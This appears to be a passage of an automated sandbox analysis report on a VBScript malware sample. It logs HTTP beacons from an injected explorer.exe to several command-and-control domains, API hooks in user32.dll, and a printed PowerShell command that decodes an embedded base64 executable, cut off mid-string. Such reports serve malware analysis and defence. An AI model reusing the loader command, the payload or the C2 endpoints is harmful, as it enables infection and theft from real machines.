                                        Connection: Keep-Alive
                                        Jul 13, 2023 09:48:52.855475903 CEST1INHTTP/1.1 200 OK
                                        Date: Thu, 13 Jul 2023 07:48:52 GMT
                                        Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4
                                        Last-Modified: Thu, 13 Jul 2023 01:25:13 GMT
                                        ETag: "3daac-6005434384d5a"
                                        Accept-Ranges: bytes
                                        Content-Length: 252588
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: text/plain
                                        Data Raw: 3d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                        Data Ascii: =AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                        Jul 13, 2023 09:48:52.855560064 CEST3INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                        Jul 13, 2023 09:48:52.855632067 CEST4INData Raw: 45 54 52 35 62 66 63 2f 71 31 34 79 32 34 64 34 47 53 4e 75 44 46 6d 50 34 75 6c 6b 31 33 4e 72 36 63 63 63 38 38 69 39 49 2b 33 75 76 79 6c 6d 7a 55 45 36 4c 4c 6b 44 37 77 6c 4c 46 43 79 45 2f 79 52 53 51 71 72 73 62 5a 6c 47 6e 4a 73 72 5a 73
                                        Data Ascii: ETR5bfc/q14y24d4GSNuDFmP4ulk13Nr6ccc88i9I+3uvylmzUE6LLkD7wlLFCyE/yRSQqrsbZlGnJsrZs1RAN2TXLMmSwx+ueApvTYL8wB7dJ9P77yMngxLSHYA7KOHLarS0s4+0Tp5VysftGdYop44V/Tlr59gz4oQ/067mY1NTFGBJX/x33evL0flfeHlxszXYUhOO60uyRX8Fvz6ugRNB99l0wEIceVj678/G/RVPt1+U+3
                                        Jul 13, 2023 09:48:52.855694056 CEST5INData Raw: 4e 50 53 51 54 55 5a 36 63 30 47 2b 57 65 68 67 7a 42 74 5a 6d 56 64 5a 50 61 64 62 4f 68 6e 37 58 79 6d 42 36 63 2f 79 6b 48 66 41 4b 32 69 57 46 2f 71 69 41 54 31 58 4a 4a 76 34 6f 4c 49 34 48 6f 59 58 78 4c 43 76 50 37 68 46 6a 52 50 76 34 35
                                        Data Ascii: NPSQTUZ6c0G+WehgzBtZmVdZPadbOhn7XymB6c/ykHfAK2iWF/qiAT1XJJv4oLI4HoYXxLCvP7hFjRPv45Kr1Km3g88oYxaOtiFR60MLlfHU7me6feWSzxk6tM8iZbeEKpaglslcxvVE8R8iz3yezJUUzVEySTGRUZE+1FWspmobygUmTHufvaSrMAOxCoAG/emcYLSvqt2ruo1ikpbuyGDYhBgCpdEsj0+R9l72rJw5hrubvdF
                                        Jul 13, 2023 09:48:53.033914089 CEST7INData Raw: 61 34 47 62 64 74 6a 48 35 44 69 6e 57 6a 6d 6b 57 52 34 68 74 55 58 6b 36 54 46 73 63 32 56 6a 35 4c 76 5a 36 76 4c 6d 38 79 6f 57 53 43 61 70 34 53 7a 55 6a 57 35 2f 33 65 48 62 68 38 4f 49 4a 34 57 6c 4a 76 4a 37 6e 75 69 6e 49 43 31 74 69 32
                                        Data Ascii: a4GbdtjH5DinWjmkWR4htUXk6TFsc2Vj5LvZ6vLm8yoWSCap4SzUjW5/3eHbh8OIJ4WlJvJ7nuinIC1ti2pgY7M1oDhthNGMwGN5GKst6iP6VqzvcmIDjKWEVeXGyZJKuCZvSQ2gHzG7jpdg2r5Rk2+FLtJ7ZzOMwJzhXjXzp/2/oBroSt+LddEARq7urmeS7kYk9XPsN9ZmEoqT7To63LwSW8n38HoDZqRV5E52csIPxscoPiv
                                        Jul 13, 2023 09:48:53.033987045 CEST8INData Raw: 32 74 44 6f 49 33 41 49 52 33 71 4b 58 62 50 53 7a 7a 44 48 73 63 71 46 66 64 51 33 58 75 48 6e 42 64 7a 4c 58 41 72 55 69 54 70 75 6b 6e 69 75 41 64 38 45 4b 33 67 42 35 67 63 4f 52 71 73 7a 78 64 58 36 33 35 45 75 6e 34 58 77 31 79 69 57 45 77
                                        Data Ascii: 2tDoI3AIR3qKXbPSzzDHscqFfdQ3XuHnBdzLXArUiTpukniuAd8EK3gB5gcORqszxdX635Eun4Xw1yiWEwbb08nhq8bEr56aUp4ocoPwZHJfP8/9NeRNExT9VxSlLtnEJs3zTuakyYFVPBPXG4xErImjU0v1BDu8qufqT/7O90tKS0A50g/wM0sA6wDLDXyujO4YToLTl6+w+LGhCGUDltk0nducVk5ffdYjp7S/khTpV79TKqC
                                        Jul 13, 2023 09:48:53.034013033 CEST9INData Raw: 53 2f 59 43 53 66 33 38 55 6c 6f 32 6b 76 76 2b 78 4a 4d 31 48 6f 6c 6b 7a 34 68 50 4e 4a 66 41 7a 64 7a 6d 32 31 38 44 54 6c 6e 44 4d 41 43 35 54 65 4d 7a 77 6a 65 66 5a 65 44 6d 72 53 55 74 62 4c 6f 4b 42 45 55 58 42 66 4e 69 53 39 55 72 79 63
                                        Data Ascii: S/YCSf38Ulo2kvv+xJM1Holkz4hPNJfAzdzm218DTlnDMAC5TeMzwjefZeDmrSUtbLoKBEUXBfNiS9Urycq3z1JkR9OHqDYNm8K2nNNXb+vXFErNgT9v5P1gaTf74D2ACIzbYb2/PUpO/VdkVq92xjVqlUpYUbBk1lD7GkuRtjoTZ6TGG0hotsHAt87LLToSSnEXXeLZ39sNBRKTMlQdOX+bKWX3C9xr+HO+GmDy/YSZoAmIbGE
                                        Jul 13, 2023 09:48:53.034038067 CEST10INData Raw: 63 33 4b 2b 59 76 54 6b 42 53 31 71 62 53 30 6d 53 62 41 4b 37 48 50 4a 6c 79 46 59 35 58 6f 51 2f 67 6d 33 34 6d 59 4e 72 66 6b 59 6e 36 68 4c 56 4e 6e 50 30 33 4e 4f 39 6e 4a 47 44 31 42 42 35 63 33 36 48 65 73 4e 38 43 74 6c 43 78 49 71 4a 74
                                        Data Ascii: c3K+YvTkBS1qbS0mSbAK7HPJlyFY5XoQ/gm34mYNrfkYn6hLVNnP03NO9nJGD1BB5c36HesN8CtlCxIqJtWGw9/UiUTU1pAX+X/FQmxVc3cCONEiX4OsPcWqdzBgSr8cjmrpXS6IHwtSknsKAdv/uS84ZMtBVf2J/PAHV9B169muHG56eMwb88pk+u1XeRsKQwxZjStkis8738B1yiEMWIszUoXPtA/PorzMY+Cm134TFAjjP+2
                                        Jul 13, 2023 09:48:53.034063101 CEST12INData Raw: 4c 4a 56 30 6c 5a 55 63 5a 63 2f 41 32 6d 4b 4b 43 37 53 43 39 52 6f 50 33 35 6a 54 65 68 4a 54 49 62 53 74 37 34 62 72 64 61 73 46 58 55 66 42 7a 39 6b 6b 53 31 55 53 61 58 47 57 6b 33 4b 6a 7a 61 52 35 63 45 64 56 42 65 78 4c 73 31 70 55 51 34
                                        Data Ascii: LJV0lZUcZc/A2mKKC7SC9RoP35jTehJTIbSt74brdasFXUfBz9kkS1USaXGWk3KjzaR5cEdVBexLs1pUQ4wSXEemvGPDmW6N4Bge1/Vm1qNF/mXJinVzDUwHpvi9S5hzJgAjNPU2Epk+DlAx9y0YwsD28xlo7kqbqgFMApVEW9Iesm1lJWx1+PnimRQyglaGI6Cvj6R+5uj7JJfWfuriobCevIXcaG6TZc9CnlmITeMI2lXegYn
                                        Jul 13, 2023 09:48:53.034087896 CEST13INData Raw: 37 43 64 2f 51 77 42 7a 34 58 5a 36 2b 4a 58 46 76 37 56 66 49 36 65 7a 69 57 52 53 42 47 58 33 6a 71 50 48 44 38 73 32 45 33 43 46 67 71 57 34 46 71 68 6e 66 54 2f 63 6a 68 74 4d 76 51 47 69 6d 45 71 6c 51 6b 2b 78 39 71 48 47 77 79 41 6d 76 49
                                        Data Ascii: 7Cd/QwBz4XZ6+JXFv7VfI6eziWRSBGX3jqPHD8s2E3CFgqW4FqhnfT/cjhtMvQGimEqlQk+x9qHGwyAmvIXYytaXDEb3Zi9453tSYVi5YalqCwYjzydgOWIxNin7znG/vslQeKVLjHgR/gi+a8q1DwB0rnEYYPmMFrxuiCjCrRXgVIkZQT97epKarqYLektaV9g4Dto9OmPtQft99/h0stRXqGj0QERBSiCeVsLO6sF52h3rY+/
                                        Jul 13, 2023 09:48:53.034112930 CEST14INData Raw: 6a 4e 63 6a 45 32 47 6d 5a 47 48 79 4c 30 52 66 70 75 70 43 4e 53 6e 2b 6a 65 45 45 31 44 67 6b 2f 42 49 76 71 77 6b 55 7a 36 52 76 4c 56 77 63 70 6d 50 42 61 54 66 34 70 48 6c 41 68 6c 57 6f 55 72 78 64 36 44 68 77 4b 7a 6f 4f 51 41 57 38 36 68
                                        Data Ascii: jNcjE2GmZGHyL0RfpupCNSn+jeEE1Dgk/BIvqwkUz6RvLVwcpmPBaTf4pHlAhlWoUrxd6DhwKzoOQAW86h9EP/ja/BW03eK+KWDHwzm6QoV2tWNGals1GEHNkbkduZD6QlsEaY80BVsWNdzVts1mYZwbrpwrj9zi0iAHBl/hpm6jKsxpU4BVoMofbKJIMMvQn6gdnrgDQmZ0zzUoxam/5Zw5UNOheOks6dx22JuQTmzJg1bQhuC


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        1192.168.2.34970176.223.105.23080C:\Windows\explorer.exe
                                        TimestampkBytes transferredDirectionData
                                        Jul 13, 2023 09:50:17.734031916 CEST267OUTGET /g94s/?e8a=SOSNSp6179aTy13qq7TcaAlSRULweXb3E3crC3cjWejL5clntEZHzdPIzB6indnn7XUZ&DrKTC2=LjGd HTTP/1.1
                                        Host: www.apinspect.net
                                        Connection: close
                                        Data Raw: 00 00 00 00 00 00 00
                                        Data Ascii:
                                        Jul 13, 2023 09:50:17.770692110 CEST268INHTTP/1.1 301 Moved Permanently
                                        location: https://apinspect.net/g94s/?e8a=SOSNSp6179aTy13qq7TcaAlSRULweXb3E3crC3cjWejL5clntEZHzdPIzB6indnn7XUZ&DrKTC2=LjGd
                                        vary: Accept-Encoding
                                        server: DPS/2.0.0+sha-2862925
                                        x-version: 2862925
                                        x-siteid: eu-central-1
                                        set-cookie: dps_site_id=eu-central-1; path=/
                                        date: Thu, 13 Jul 2023 07:50:17 GMT
                                        keep-alive: timeout=5
                                        transfer-encoding: chunked
                                        connection: close
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        2192.168.2.34970299.83.196.7180C:\Windows\explorer.exe
                                        TimestampkBytes transferredDirectionData
                                        Jul 13, 2023 09:50:39.367477894 CEST269OUTGET /g94s/?DrKTC2=LjGd&e8a=GuZ41zQWOd+87sgZ9z9r0yJ0b7/bNTnEQt2o5soiWmDSZcifYwExlLr0dWNcGWkaVVoe HTTP/1.1
                                        Host: www.baroevent.com
                                        Connection: close
                                        Data Raw: 00 00 00 00 00 00 00
                                        Data Ascii:
                                        Jul 13, 2023 09:50:39.839054108 CEST270INHTTP/1.1 403
                                        Date: Thu, 13 Jul 2023 07:50:39 GMT
                                        Content-Type: application/json;charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Set-Cookie: JSESSIONID=DA95767C8645FF60486BC80990A57CE3; Path=/; HttpOnly
                                        X-Content-Type-Options: nosniff
                                        X-XSS-Protection: 1; mode=block
                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                        Pragma: no-cache
                                        Expires: 0
                                        Data Raw: 37 39 0d 0a 7b 22 74 69 6d 65 73 74 61 6d 70 22 3a 22 32 30 32 33 2d 30 37 2d 31 33 54 30 37 3a 35 30 3a 33 39 2e 37 30 31 2b 30 30 30 30 22 2c 22 73 74 61 74 75 73 22 3a 34 30 33 2c 22 65 72 72 6f 72 22 3a 22 46 6f 72 62 69 64 64 65 6e 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 41 63 63 65 73 73 20 44 65 6e 69 65 64 20 21 22 2c 22 70 61 74 68 22 3a 22 2f 67 39 34 73 2f 22 7d 0d 0a
                                        Data Ascii: 79{"timestamp":"2023-07-13T07:50:39.701+0000","status":403,"error":"Forbidden","message":"Access Denied !","path":"/g94s/"}
                                        Jul 13, 2023 09:50:39.839086056 CEST270INData Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        3192.168.2.349703185.53.179.9180C:\Windows\explorer.exe
                                        TimestampkBytes transferredDirectionData
                                        Jul 13, 2023 09:51:21.203156948 CEST271OUTGET /g94s/?DrKTC2=LjGd&e8a=tzSFV3H7hErTYvWZwPPC/GAyGN0rrg2x5F2fwYgRRUbDdRuSW2XehEr5Lw08uOFm07l+ HTTP/1.1
                                        Host: www.hyperpigmentation-91528.bond
                                        Connection: close
                                        Data Raw: 00 00 00 00 00 00 00
                                        Data Ascii:
                                        Jul 13, 2023 09:51:21.229859114 CEST271INHTTP/1.1 403 Forbidden
                                        Server: nginx
                                        Date: Thu, 13 Jul 2023 07:51:21 GMT
                                        Content-Type: text/html
                                        Content-Length: 146
                                        Connection: close
                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                        Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        4192.168.2.349704150.95.255.3880C:\Windows\explorer.exe
                                        TimestampkBytes transferredDirectionData
                                        Jul 13, 2023 09:52:26.959572077 CEST272OUTGET /g94s/?e8a=4rsHG0K5vlabiiLb0b+gqyCvQQblgz1hCMRkDjqQQizxtgmj5/lVmT/rQgDGf/7aGVqR&DrKTC2=LjGd HTTP/1.1
                                        Host: www.qsmdrkjw.cfd
                                        Connection: close
                                        Data Raw: 00 00 00 00 00 00 00
                                        Data Ascii:
                                        Jul 13, 2023 09:52:27.227644920 CEST273INHTTP/1.1 302 Found
                                        Date: Thu, 13 Jul 2023 07:52:27 GMT
                                        Server: Apache
                                        Location: http://dfltweb1.onamae.com
                                        Content-Length: 210
                                        Connection: close
                                        Content-Type: text/html; charset=iso-8859-1
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 64 66 6c 74 77 65 62 31 2e 6f 6e 61 6d 61 65 2e 63 6f 6d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://dfltweb1.onamae.com">here</a>.</p></body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        5192.168.2.349705150.95.255.3880C:\Windows\explorer.exe
                                        TimestampkBytes transferredDirectionData
                                        Jul 13, 2023 09:52:47.968513966 CEST274OUTGET /g94s/?DrKTC2=LjGd&e8a=5qGn5zDRUH6BiPO85kMHocR4ZABcZylpPNAkuw/9HE6KA+R+11lsVjOMN8VjI6ygwzFy HTTP/1.1
                                        Host: www.lajzznhk.cfd
                                        Connection: close
                                        Data Raw: 00 00 00 00 00 00 00
                                        Data Ascii:
                                        Jul 13, 2023 09:52:48.247250080 CEST274INHTTP/1.1 302 Found
                                        Date: Thu, 13 Jul 2023 07:52:48 GMT
                                        Server: Apache
                                        Location: http://dfltweb1.onamae.com
                                        Content-Length: 210
                                        Connection: close
                                        Content-Type: text/html; charset=iso-8859-1
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 64 66 6c 74 77 65 62 31 2e 6f 6e 61 6d 61 65 2e 63 6f 6d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://dfltweb1.onamae.com">here</a>.</p></body></html>


                                        Code Manipulations

                                        User Modules

                                        Hook Summary

                                        Function NameHook TypeActive in Processes
                                        PeekMessageAINLINEexplorer.exe
                                        PeekMessageWINLINEexplorer.exe
                                        GetMessageWINLINEexplorer.exe
                                        GetMessageAINLINEexplorer.exe

                                        Processes

                                        Process: explorer.exe, Module: user32.dll
                                        Function NameHook TypeNew Data
                                        PeekMessageAINLINE0x48 0x8B 0xB8 0x87 0x7E 0xED
                                        PeekMessageWINLINE0x48 0x8B 0xB8 0x8F 0xFE 0xED
                                        GetMessageWINLINE0x48 0x8B 0xB8 0x8F 0xFE 0xED
                                        GetMessageAINLINE0x48 0x8B 0xB8 0x87 0x7E 0xED

                                        Statistics

                                        CPU Usage

                                        Click to jump to process

                                        Memory Usage

                                        Click to jump to process

                                        High Level Behavior Distribution

                                        Click to dive into process behavior distribution

                                        Behavior

                                        Click to jump to process

                                        System Behavior

                                        General

                                        Target ID:0
                                        Start time:09:48:47
                                        Start date:13/07/2023
                                        Path:C:\Windows\System32\wscript.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Scan_Doc.vbs"
                                        Imagebase:0x7ff61db60000
                                        File size:163'840 bytes
                                        MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        General

                                        Target ID:1
                                        Start time:09:48:49
                                        Start date:13/07/2023
                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string('TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAJmMmGQAAAAAAAAAAOAAAiELAVAAAEYAAAAGAAAAAAAAGmQAAAAgAAAAgAAAAAAAEAAgAAAAAgAABAAAAAAAAAAGAAAAAAAAAADAAAAAAgAAAAAAAAMAYIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAMVjAABPAAAAAIAAACgDAAAAAAAAAAAAAAAAAAAAAAAAAKAAAAwAAADEYgAAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAAIEQAAAAgAAAARgAAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNyYwAAACgDAAAAgAAAAAQAAABIAAAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAAKAAAAACAAAATAAAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAAD5YwAAAAAAAEgAAAACAAUAuDEAAAQvAAADAAAAAAAAALxgAAAIAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABooSQAABioeAigBAAAKKh4CKAQAAAoqABMwCABJAAAAAAAAAHMFAAAKgAEAAAQWKwEWRQMAAAACAAAADwAAABwAAAArJ3MGAAAKgAIAAAQXK+BzBwAACoADAAAEGCvTcwgAAAqABAAABBkrxioufgEAAARvCQAACioufgIAAARvCgAACioufgMAAARvCwAACioufgQAAARvDAAACir2FysBFiwAfgUAAAQUKBsAAAosJHIBAABwHChKAAAG0AUAAAIoEAAACm8cAAAKcx0AAAqABQAABH4FAAAEKhp+BgAABCoeAoAGAAAEKlZzDQAABigeAAAKdAYAAAKABwAABCoeAigfAAAKKhp+BwAABCoaKA4AAAYqHgIoEwAACioAABswDwDnBgAAAQAAESAADAAAKCAAAAoWKwEWRQwAAAAFAAAAVwEAAGQBAAAzAgAAaQIAAHoCAAClAgAA0wIAAPgCAAAVAwAAaQMAALUDAAA4dQYAAHMhAAAKJSgiAAAKbyMAAAoCKCQAAApyIQAAcBYoSgAABnItAABwFyhKAAAGbyUAAApyMQAAcBgoSgAABnI/AABwHChKAAAGbyUAAApyQwAAcBwoSgAABnJPAABwHihKAAAGbyUAAApyUwAAcBgoSgAABnJfAABwHShKAAAGbyUAAApyYwAAcBgoSgAABnJ1AABwHShKAAAGbyUAAApyeQAAcBwoSgAABnKLAABwFyhKAAAGbyUAAApyjwAAcB4oSgAABnKhAABwHihKAAAGbyUAAApypQAAcBwoSgAABnKxAABwGChKAAAGbyUAAApytQAAcBsoSgAABnLHAABwGyhKAAAGbyUAAApyywAAcBwoSgAABnLdAABwGShKAAAGbyUAAApy4QAAcB0oSgAABnLzAABwGihKAAAGbyUAAApvJgAACgoGbycAAAoLFzh0/v//BygkAAAKCxg4Z/7//wNy9wAAcBooSgAABhYoKAAACjoEAQAAHxooKQAACiVy+wAAcBooSgAABigqAAAKEwQSBP4WFQAAAW8RAAAKcv8AAHAdKEoAAAYoKwAACgxyCQEAcB0oSgAABigsAAAKKAEAACstTHMuAAAKcy8AAAoTBREFF28wAAAKEQVyFQEAcBkoSgAABm8xAAAKEQVyiQEAcBooSgAABggoMgAACm8zAAAKJREFbzQAAApvNQAACiZ